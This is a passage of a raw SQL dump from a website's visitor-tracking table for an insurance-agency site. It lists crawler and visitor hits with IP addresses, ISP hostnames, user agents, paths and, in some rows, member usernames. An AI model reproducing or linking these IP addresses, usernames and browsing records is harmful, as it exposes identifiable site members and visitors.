bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7161,'0b_6c6fe3fc16e04605a5b3d038f317acc7','1458521315','173.56.252.3','pool-173-56-252-3.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1280 x 800','','','','','','0','0',0),(7163,'0b_6c6fe3fc16e04605a5b3d038f317acc7','1458521317','173.56.252.3','pool-173-56-252-3.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 800','','','','','','0','0',0),(7166,'0b_6c6fe3fc16e04605a5b3d038f317acc7','1458521334','173.56.252.3','pool-173-56-252-3.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 800','','','','','','0','0',0),(7169,'0b_16e0942d6d455d314a4eb3e18ff80794','1458521492','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7172,'0b_e819fba0a490ddb94f69f2673d7a7bbb','1458521852','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(7175,'0b_381de6865c013ff9ebf9d0a9062452c1','1458524801','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7176,'0b_1646d005a91ae8db59bad88b861d6d7d','1458525727','180.76.15.149','baiduspider-180-76-15-149.crawl.baidu.com','/?p=277','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(7179,'0b_1646d005a91ae8db59bad88b861d6d7d','1458525728','180.76.15.139','baiduspider-180-76-15-139.crawl.baidu.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(7182,'0b_e6de3ecb2d0ffd3de0bb99d4cf8e58ed','1458527929','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(7184,'0b_0d6b59120164f599da29ea3c7492523b','1458528015','157.55.39.198','msnbot-157-55-39-198.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(7187,'0b_5d9ee360d4809c167a102230618169bc','1458529614','66.249.83.246,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(7190,'0b_8de4428f4a8a40f9b223f1f6f65b1781','1458529615','66.249.83.209,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(7193,'0b_52a7cc017083805fbfb7e8626a273284','1458530924','180.76.15.14','baiduspider-180-76-15-14.crawl.baidu.com','/about-us/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(7194,'0b_58818b17bacc264164b112f22c439b8e','1458532200','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7196,'0b_68ed8ab331204941ee0b69337bfa8672','1458534687','64.246.161.30','www.whois.sc','/robots.txt','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','','',0,'WinXP','Firefox 3','sc','','','SurveyBot','','','','0','0',0),(7197,'0b_68ed8ab331204941ee0b69337bfa8672','1458534687','64.246.161.30','www.whois.sc','/','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','http://whois.domaintools.com/empireins.com','',0,'WinXP','Firefox 3','sc','','','SurveyBot','','','','0','0',0),(7200,'0b_e360e0e6e413199e980bccb03481af57','1458536193','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/SSO/235_42.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7202,'0b_893e751c1ac383f41f796eea6c3b37c5','1458537215','78.130.192.194','clients-pools.pl.cooolbox.bg','/register/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','bg','','','','','','','0','0',0),(7203,'0b_24968cfb66d614a0b450a4e5f36a7ada','1458537619','157.55.39.142','msnbot-157-55-39-142.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7205,'0b_24968cfb66d614a0b450a4e5f36a7ada','1458537658','157.55.39.142','msnbot-157-55-39-142.search.msn.com','/igo','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(7208,'0b_24968cfb66d614a0b450a4e5f36a7ada','1458537675','157.55.39.142','msnbot-157-55-39-142.search.msn.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(7209,'0b_a96de1461d5aaa75a0cee0ce69665384','1458541885','216.81.71.72','216.81.71.72','/','=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16','','',0,'Win7','','','','','','','','','0','0',0),(7212,'0b_95adeec3d811004f7bb8a7447e8a8976','1458543196','157.55.39.198','msnbot-157-55-39-198.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7214,'0b_f85789d964c9bbf9e613121e0d142118','1458549930','82.145.46.102','82.145.46.102','/robots.txt','Mozilla/5.0 (compatible; aiHitBot/2.9; +https://www.aihitdata.com/about)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7217,'0b_f85789d964c9bbf9e613121e0d142118','1458549941','82.145.46.102','82.145.46.102','/','Mozilla/5.0 (compatible; aiHitBot/2.9; +https://www.aihitdata.com/about)','','',0,'','','','','','','','','','0','0',0),(7218,'0b_9f922772e7328e5f8650ff8df1a02495','1458554825','195.154.204.117','195-154-204-117.rev.poneytelecom.eu','/wp-admin/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/23.0.1271.6 Safari/537.11','','',0,'WinXP','Chrome 23','ru','','','','','','','0','0',0),(7221,'0b_497e44e6a1924f799060b166ca52fadc','1458558078','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/SSO/235_14.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7223,'0b_dc3ee27042bca7a8b8a1b50b4d93c547','1458558376','68.180.229.91','b115355.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(7224,'0b_dc3ee27042bca7a8b8a1b50b4d93c547','1458558378','68.180.229.91','b115355.yse.yahoo.net','/case-status/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(7227,'0b_332b66cd4e177bd1c35cc80860016316','1458559066','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(7230,'0b_ee03eaa8b1153bd3d4ef1965164c8f28','1458560367','180.76.15.9','baiduspider-180-76-15-9.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(7232,'0b_c83737b01381934c5c28d632e00a5c00','1458564165','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7233,'0b_d4265c1621ed1a50f9185b07b8935811','1458565842','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(7236,'0b_d4265c1621ed1a50f9185b07b8935811','1458565843','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(7239,'0b_8232220131f11dee39306815cfe02e1a','1458567637','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(7242,'0b_8232220131f11dee39306815cfe02e1a','1458567639','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(7244,'0b_250c4717f869ca68754c7147d6d888cc','1458567874','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7245,'0b_250c4717f869ca68754c7147d6d888cc','1458567875','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7248,'0b_904ee8fa0685289bccca84e95f1db6cc','1458568778','195.154.204.117','195-154-204-117.rev.poneytelecom.eu','/wp-admin/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/23.0.1271.17 Safari/537.11','','',0,'WinXP','Chrome 23','ru','','','','','','','0','0',0),(7250,'0b_18e6dc7da34be2229ccd1c374459ddab','1458569535','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7251,'0b_18e6dc7da34be2229ccd1c374459ddab','1458569537','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7253,'0b_85d297593755cc671975d7c3a21b28d7','1458570725','172.56.14.153','172.56.14.153','/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(7254,'0b_85d297593755cc671975d7c3a21b28d7','1458570737','172.56.14.153','172.56.14.153','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(7256,'0b_85d297593755cc671975d7c3a21b28d7','1458570765','172.56.14.153','172.56.14.153','/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(7257,'0b_85d297593755cc671975d7c3a21b28d7','1458570771','172.56.14.153','172.56.14.153','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(7260,'0b_85d297593755cc671975d7c3a21b28d7','1458570771','172.56.14.153','172.56.14.153','/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(7263,'0b_85d297593755cc671975d7c3a21b28d7','1458570776','172.56.14.153','172.56.14.153','/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(7266,'0b_85d297593755cc671975d7c3a21b28d7','1458570782','172.56.14.153','172.56.14.153','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(7269,'0b_85d297593755cc671975d7c3a21b28d7','1458570842','172.56.14.153','172.56.14.153','/agent-tools/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(7272,'0b_85d297593755cc671975d7c3a21b28d7','1458570864','172.56.14.153','172.56.14.153','/carriers/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(7275,'0b_85d297593755cc671975d7c3a21b28d7','1458570872','172.56.14.153','172.56.14.153','/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/carriers/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(7278,'0b_85d297593755cc671975d7c3a21b28d7','1458570873','172.56.14.153','172.56.14.153','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(7280,'0b_85d297593755cc671975d7c3a21b28d7','1458570925','172.56.14.153','172.56.14.153','/forms/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G530T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(7281,'0b_cbea394357eea861ce06b114987da1f7','1458572061','23.19.216.173','23.19.216.173','/about-us/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(7284,'0b_cbea394357eea861ce06b114987da1f7','1458572064','23.19.216.173','23.19.216.173','/?p=9','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(7286,'0b_cbea394357eea861ce06b114987da1f7','1458572065','23.19.216.173','23.19.216.173','/about-us/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(7287,'0b_8cdcb8576c396d26aabaf3097e81bbe1','1458572645','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(7290,'0b_8cdcb8576c396d26aabaf3097e81bbe1','1458572648','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(7292,'0b_8cdcb8576c396d26aabaf3097e81bbe1','1458572656','184.154.139.23','placeholder.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(7293,'0b_8cdcb8576c396d26aabaf3097e81bbe1','1458572662','184.154.139.23','placeholder.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(7296,'0b_415223d91ab4aadfa135f65d19d4b270','1458573785','107.77.68.25','107.77.68.25','/','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG-SM-N910A Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36','','',0,'Android 5','Chrome 49 Mobile','us','','','','','','','0','0',0),(7298,'0b_415223d91ab4aadfa135f65d19d4b270','1458573796','107.77.68.25','107.77.68.25','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG-SM-N910A Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 49 Mobile','us','','','','','','','0','0',0),(7299,'0b_e4735c79360035f40c656a56bae54ed5','1458573861','66.249.73.169','crawl-66-249-73-169.googlebot.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(7301,'0b_08532cfeedd6e76b2132c1cd6240e13c','1458574141','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7302,'0b_08532cfeedd6e76b2132c1cd6240e13c','1458574144','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7304,'0b_2f902eeeb3aa4cbc9f5089874cd5d3aa','1458574527','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(7305,'0b_2f902eeeb3aa4cbc9f5089874cd5d3aa','1458574529','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(7307,'0b_2f902eeeb3aa4cbc9f5089874cd5d3aa','1458574545','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(7308,'0b_2f902eeeb3aa4cbc9f5089874cd5d3aa','1458574569','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/agent-tools/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','Shmuli','','0','51',0),(7310,'0b_53f7b55dc874d853bb21db125f6afd4f','1458574623','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7311,'0b_53f7b55dc874d853bb21db125f6afd4f','1458574624','178.255.215.70','crawl06.exabot.com','/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7313,'0b_271a86aa320ad783b82ef3030ecb9fa1','1458575334','50.74.240.14','mail.kentco.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(7314,'0b_271a86aa320ad783b82ef3030ecb9fa1','1458575338','50.74.240.14','mail.kentco.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(7316,'0b_ca8f0b59f6bc2b815f792de56ff42355','1458575424','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(7317,'0b_3345949756439bec63c227fab7e515cb','1458575425','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(7319,'0b_3345949756439bec63c227fab7e515cb','1458575426','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(7320,'0b_3345949756439bec63c227fab7e515cb','1458575464','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(7322,'0b_4cd0044464458309d07572f37b7b024a','1458575487','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(7323,'0b_4cd0044464458309d07572f37b7b024a','1458575489','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(7325,'0b_4cd0044464458309d07572f37b7b024a','1458575494','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(7326,'0b_4cd0044464458309d07572f37b7b024a','1458575498','108.58.88.178','ool-6c3a58b2.static.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(7328,'0b_4cd0044464458309d07572f37b7b024a','1458575506','108.58.88.178','ool-6c3a58b2.static.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(7329,'0b_3345949756439bec63c227fab7e515cb','1458575508','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(7332,'0b_4cd0044464458309d07572f37b7b024a','1458575509','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(7334,'0b_4cd0044464458309d07572f37b7b024a','1458575515','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 